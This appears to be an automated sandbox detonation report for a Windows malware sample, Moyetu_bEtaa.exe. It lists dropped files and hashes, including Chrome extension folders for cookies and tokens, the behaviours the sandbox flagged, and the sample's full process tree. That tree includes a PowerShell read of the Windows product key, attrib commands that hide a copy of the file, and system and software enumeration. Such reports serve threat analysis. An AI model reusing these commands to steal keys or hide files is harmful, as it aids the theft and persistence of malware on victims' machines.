SHA512 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

memory/4784-1053-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

memory/4784-1054-0x00000212C1D70000-0x00000212C1D80000-memory.dmp

memory/4784-1057-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

MD5 2f0a6a34d9b95bba0e3358ddd41ff2ac
SHA1 f39a9e7aeab9fe86fd9034284516de40186e6e93
SHA256 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5
SHA512 a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 9ac39dc31635a363e377eda0f6fbe03f
SHA1 29fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA256 9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA512 0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

MD5 f0f11cd478cc44d518c16820ede9d253
SHA1 cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512 ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png

MD5 c555604e8b6f818991e186342f856b1b
SHA1 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0
SHA256 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972
SHA512 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

MD5 2cfd3dd20571cce21f09407b28b565fb
SHA1 07a7704986e963e9ba69f7109b7450deccd23eb2
SHA256 c9eb076f465aac3c93c61f34fb7cfef6677bacbab7e0611c1c41b80b7f057792
SHA512 bec2ec4d1562c45aaa276e1687786ccd494afefe93dfa330c600e2ad8ac6783ea7988c284df42c5c811afc5d73686484012584faf553e9777f4cb0b7ad436e7d

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 be773505c8abe2230ead8627d2e65688
SHA1 8987c456a6abef46b5c35f9b7d48c995923bc97c
SHA256 bb29d38e85e41180526d1061c011204ff571735a8fcd365dc7e5e1f5c9b79cac
SHA512 5a01904b33fd9fca33e3f7981416aefcbac23d182efa736189d38560af1215430e57dd2e8b012de7ee4d608d29c553dd2999b48d019446c63e74e5b04ce3647c

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 e427e261c392f8521bd3e696884e3aed
SHA1 1e575c0ef828f3b9a4274527184f767ab3caf818
SHA256 fbb686de73f5e5dad573a9942e57dcb824053c891a4526c571cc5ad625d673a7
SHA512 dafb03d2753101f5a821f5412c41c9bf7068d35b0f4a950f70172520854a1d2a4ee0fe7940ec1d411366c39405c508c320f60b02e91b5752d0a2c5cc68b4e4ee

memory/5260-1114-0x0000020965110000-0x0000020965111000-memory.dmp

memory/5260-1113-0x0000020965110000-0x0000020965111000-memory.dmp

memory/5260-1112-0x0000020965110000-0x0000020965111000-memory.dmp

memory/5260-1121-0x0000020965110000-0x0000020965111000-memory.dmp

memory/5260-1124-0x0000020965110000-0x0000020965111000-memory.dmp

memory/5260-1123-0x0000020965110000-0x0000020965111000-memory.dmp

memory/5260-1122-0x0000020965110000-0x0000020965111000-memory.dmp

memory/5260-1120-0x0000020965110000-0x0000020965111000-memory.dmp

memory/5260-1119-0x0000020965110000-0x0000020965111000-memory.dmp

memory/5260-1118-0x0000020965110000-0x0000020965111000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2023-12-20 08:46

Reported

2023-12-20 08:50

Platform

win11-20231215-en

Max time kernel

5s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe"

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

C:\Windows\System32\Wbem\wmic.exe

wmic os get locale

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1688,8499682399230122055,716585134206746690,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1912 --field-trial-handle=1688,8499682399230122055,716585134206746690,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=2984 get ExecutablePath

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=2984 get ExecutablePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\"""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

